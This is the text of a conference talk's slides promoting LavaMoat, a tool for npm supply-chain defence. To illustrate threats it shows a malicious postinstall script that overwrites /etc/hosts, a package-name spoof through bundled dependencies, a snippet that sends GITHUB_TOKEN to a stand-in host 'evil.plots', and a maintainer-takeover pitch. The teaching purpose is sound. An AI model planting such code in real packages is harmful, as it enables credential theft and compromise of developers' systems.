I'm running code from the internet!

LavaMoat

@naugtur, 2025

Who's that guy?

#### I was into JS security <br>before I knew JS<br>or security ```js function kill(){ setTimeout('kill',0) setTimeout('kill',0) } kill() ``` _{^{first 5 lines of JS I've written break Windows 98 up to XP before SP2}}

# 📺 Previously on #### supply chain security --- ### vulnerable dependencies - audit scanners - false positives - security culture 📦npm-audit-resolver --- ### malicious install scripts - postinstall turns tsc evil - `--ignore-scripts` 📦@lavamoat/allow-scripts 📦can-i-ignore-scripts --- ### defending from malicious packages - Hardened Javascript 📦lavamoat --- ### defensive coding - prototype pollution - workshops at DefCon and NodeConfEU --- ### running malware - LavaLab experiment - Running actual malware from npm - All globals, modules mocked live 📦lavalab --- Talks available at [naugtur.pl](https://naugtur.pl)

<br> <br> # ⌨️ -> ⚙️🖥️ <br> <br> <br> _{^{Would you take a string I gave you and run it in your application's process?}} --- <br> <br> # 📦 -> ⚙️🖥️ <br> <br> <br> _{^{What if I offered to pack it in a .tgz file for you?}} --- <br> <br> # 👉📦👈 <br> <br> <br> _{^{Yes, that's what npm packages are - and they're glorious.}} --- <br> <br> # 📦 = ⌨️ <br> <br> <br> _{^{But they're also unsanitized input from the internet that you run.}}

_{^{What if not all packages are _great_ ?}}

### Software architectures rely on # 🤞 ## intention alignment <br><br> All code serves the common goal of the app working --- ### Code authors in your app: 🙋 you, the team (few) 🧑‍🤝‍🧑 other teams (more) 🧙 pkg authors (many) 🤖 AI agents (many?) --- # 🤯 ## Intention alignment is a myth --- ### 🧠🔨 - Authors publish malicious packages - Devs write buggy code - Bugfix in one corner breaks another corner - Teams work under different constraints and OKRs - Hallucinated package names - [Slopsquatting](https://socket.dev/blog/slopsquatting-how-ai-hallucinations-are-fueling-a-new-class-of-supply-chain-attacks) - AI code messing up shared resources - LLMs regurgitating old vulnerabilities --- ### I hear alignment is<br>a hard problem with humans too 😉 - Tradition - Law - Separation of powers (in gov)<br>**In software:** - Conway's law - Microservices - Error boundaries --- # Fearless cooperation # 🦸 --- ### Fearless cooperation We need tools and architectures that let software cooperate without authors necessarily trusting each other. --- #### There has been serious research [Listen to Mark S. Miller for more](https://foresight.org/summary/mark-s-miller-agoric-computational-markets-agoric-systems/) --- ### I'm here to tell you about fearless cooperation tools # 🧰

## Story time

Let's install some dependencies!

Ok, catch this: 📦

I'm not runing that.

That's what you think.

            "postinstall": "echo 💩 > /etc/hosts"
        

### Ok, wait ``` ✨🐋 npm ci cp node_modules s3:// 🔥🔥🐋🔥🔥 ```

Hold my 🍺

├─app.ts
├─node_modules
│ ├─@naugtur
│ │ └─evilpackage
| │   ├─evilPlots.js --,
| │   └─package.json   |
│ └─typescript         💩
│   ├─lib              |
│   | └─tsc.js <-------'
│   └─package.json
└─package.json
        

## ignore scripts ``` npm ci --ignore-scripts ``` Run selected scritps ``` npm rebuild bcrypt ```

#### I can spoof that package name ``` evilpackage/node_modules/bcrypt/package.json: "scripts": { "postinstall": "echo 💩 > /etc/hosts" evilpackage/package.json: "bundledDependencies": ["bcrypt"] $ npm publish ```

# Oh 💩

#### look what I found! 

#### @lavamoat/allow-scripts ``` $ allow-scripts setup $ allow-scripts auto ``` ``` .npmrc: ignore-scripts=true package.json: "lavamoat": { "allowScripts": { "@lavamoat/preinstall-always-fail": false, "@naugtur/malicious": false } } ``` --- #### for added convenience ``` package.json: "scripts": { "safeinstall": "npm ci && allow-scripts", ```

And in that moment
the installation process was protected

You can do that too in 5 minutes or less

#### let's get serious > Dear ${ eslintPluginMaintainer }, > I understand you're busy and I'd be happy to help with maintenance of your tiny but popular plugin... (Or find a common hallucination to slopsquat)

#### will you read entire node_modules? ``` const credentials = process.env["GITHUB_TOKEN"]; const req = require('https').request({ hostname: 'evil.plots', path: `/stolen/${credentials}`, }, ()=>{}); req.end(); ```

#### ok, just in case you do 

#### yo, there's an app for that! 

#### it protects me at runtime ``` package.json: "scripts": { "generate-policy": "lavamoat build.js --autopolicy", "build": "lavamoat build.js", ``` --- #### policy file ```js ./lavamoat/node/policy.json: "that-eslint-plugin>evilpackage": { "builtin": { "https.request": true }, "globals": { "process.env": true }, ``` --- #### policy override file ```js ./lavamoat/node/policy-override.json: "that-eslint-plugin>evilpackage": { "builtin": { "https": false }, "globals": { "process": false }, ``` --- ``` $ npm run build ``` ``` Error: LavaMoat - required node builtin package not in allowlist: package "evilpackage" requested "https" TypeError: Cannot read properties of undefined (reading 'env') ```

# how ?! 

### what's inside? 

### What LavaMoat does <br>at runtime? - Runs every package in a separate _Compartment_ - Uses a policy to choose what to allow in each - Destroys all globals on the outside ---  ## Hardened Javascript Provides a secure environment for running code. --- ### Ingredients - `Compartment` - scope isolation - `lockdown` - makes your Realm secure - `harden` - protects capable objects --- # 🤯 ### JS design is good for security? - Take ECMA + W3C - Add Conway's Law - Separation between language and APIs - Power only reachable through scope - Compartment controls scope - Hardened JavaScript ✅ --- ## Part of the language! #### ( eventually ) https://github.com/tc39/proposal-compartments --- ### Available as a shim  --- ### Object Capability vs identity based security - code gets references to capable objects - code doesn't "work on your behalf" <br><br> OCap is a security model that enables <br>Fearless Cooperation. --- ### Object Capability You already know how to use it ```js import { lint } from 'some-linter' import { readFile } from 'node:fs/promises' const fs = { readFile } lint({ fs }) ``` --- ### Ok, that was a lot. - Install time protections with `allow-scripts`. - Runtime protections with policy, - for node.js and bundlers (webpack plugin) - using Hardened JavaScript and OCap LavaMoat is protecting installation, build and runtime of MetaMask - with up to 30 million users --- https://lavamoat.github.io  Your adoption and feedback will help us start the <br>era of Fearless Cooperation.

I'll help you set up LavaMoat in your project

@naugtur   naugtur.pl

naugtur.pl/training